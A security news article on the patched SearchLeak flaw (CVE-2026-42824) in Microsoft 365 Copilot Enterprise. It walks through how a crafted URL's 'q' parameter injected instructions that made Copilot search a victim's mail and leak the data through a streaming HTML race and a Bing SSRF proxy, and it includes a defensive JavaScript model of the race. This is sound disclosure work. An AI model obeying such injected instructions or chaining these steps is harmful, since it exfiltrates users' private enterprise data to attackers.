Critical SearchLeak Flaw in Microsoft 365 Copilot Exposed Sensitive Enterprise Data
2026-6-16 07:28:35 Author: thecyberexpress.com

A newly disclosed SearchLeak vulnerability in Microsoft 365 Copilot Enterprise exposed a critical pathway for attackers to steal sensitive organizational data through a specially crafted URL. The flaw chain, now tracked as CVE-2026-42824, was patched by Microsoft earlier this month and assigned a critical severity rating due to its potential impact.

Security researchers at Varonis discovered the issue by combining three separate weaknesses that, on their own, posed limited risk. Together, however, they enabled attackers to silently extract emails, calendar information, SharePoint documents, OneDrive files, and other indexed enterprise content accessible through Microsoft 365 Copilot Enterprise.

How the SearchLeak Vulnerability Worked 

According to the researchers, the SearchLeak vulnerability combined an AI-specific flaw known as Parameter-to-Prompt Injection (P2P) with two traditional web security issues: an HTML rendering race condition and a server-side request forgery (SSRF) vulnerability involving Bing. 

The first stage exploited the search function of Microsoft 365 Copilot Enterprise, where the “q” URL parameter was passed directly to Copilot as an executable prompt. Instead of being treated as a simple search query, attacker-controlled input could be interpreted as instructions. 

Researchers demonstrated that a malicious URL could instruct Copilot to search a victim’s mailbox, retrieve email titles or other sensitive content, and embed the extracted data inside an image URL without requiring any user interaction beyond a click. 

Chaining Three Flaws into One Attack 

The second stage relied on an HTML rendering race condition. While Microsoft attempted to neutralize potentially dangerous HTML by wrapping responses inside code blocks, that protection occurred only after Copilot completed generating its response. During the streaming phase, raw HTML, including image tags, could briefly render and trigger outbound requests before sanitization took effect. 
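The rendering race described above, modelled as an added example (not Varonis's or Microsoft's code): a streaming renderer that neutralizes markup only after the final chunk lets a raw image tag reach the page mid-stream, while escaping every chunk as it arrives closes that window. The sample chunks and the example.invalid host are constructed.

```javascript
// Escape HTML metacharacters so markup is displayed as text, never interpreted.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Simulated streaming renderer. `states` stands in for what the DOM looked
// like after each paint, so a caller can check whether raw markup was ever live.
function renderStream(chunks, { sanitizePerChunk }) {
  const states = [];
  let buffer = '';
  for (const chunk of chunks) {
    // Escaping per chunk is safe even when a tag is split across chunks:
    // the '<' is neutralized the moment it arrives.
    buffer += sanitizePerChunk ? escapeHtml(chunk) : chunk;
    states.push(buffer); // the browser paints after each chunk
  }
  if (!sanitizePerChunk) {
    // Flawed pattern: wrap the completed response in a code block only once
    // generation has finished. Everything painted before this point was raw.
    states.push('<pre>' + escapeHtml(buffer) + '</pre>');
  }
  return states;
}

// Did any painted state contain a live <img src=...>, which would trigger a fetch?
function leakedDuringStream(states) {
  return states.some(s => /<img\b[^>]*\bsrc\s*=/i.test(s));
}

// Constructed sample stream, split the way a model emits tokens.
const SAMPLE_CHUNKS = [
  'Here is what I found: ',
  '<img src="https://example.invalid',
  '/pixel?d=DATA">',
  ' done.',
];

// Usage: compare the two rendering strategies on the same stream.
const leaky = renderStream(SAMPLE_CHUNKS, { sanitizePerChunk: false });
const safe = renderStream(SAMPLE_CHUNKS, { sanitizePerChunk: true });
console.log('sanitize at end  -> leaked mid-stream:', leakedDuringStream(leaky)); // true
console.log('sanitize per chunk -> leaked mid-stream:', leakedDuringStream(safe)); // false
```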


The final component of the SearchLeak vulnerability involved a Content Security Policy bypass through Bing. Since Bing domains were allowlisted, attackers leveraged Bing’s image search endpoint, which performs server-side fetching of image URLs. By embedding stolen data within those URLs, Bing unknowingly acted as a proxy, forwarding the information to attacker-controlled servers. 

As described by Varonis, the attack required no plugins, elevated privileges, additional clicks, or suspicious domains. Victims only needed to open a trusted Microsoft link. 

Potential Impact of CVE-2026-42824 

Because Microsoft 365 Copilot Enterprise operates with the user’s existing permissions, successful exploitation of CVE-2026-42824 effectively granted attackers access to whatever information the targeted employee could access. 

Potentially exposed data included email content, one-time passwords, password reset links, calendar events, meeting notes, attendee information, confidential communications, SharePoint files, OneDrive documents, earnings reports, salary information, acquisition plans, and other sensitive business records. 

The researchers noted that the novelty of the SearchLeak vulnerability lies in how AI-enabled prompt injection made older attack techniques practical in a new environment. Without the P2P flaw, attackers could not inject malicious instructions; without the race condition, the HTML would be neutralized; and without the SSRF weakness, the Content Security Policy would block data exfiltration. 

Microsoft has since remediated the issue under CVE-2026-42824, but researchers say the case highlights how AI systems can introduce new attack paths by connecting previously understood vulnerabilities in unexpected ways. 


Article source: https://thecyberexpress.com/searchleak-vulnerability-microsoft-365-copilot/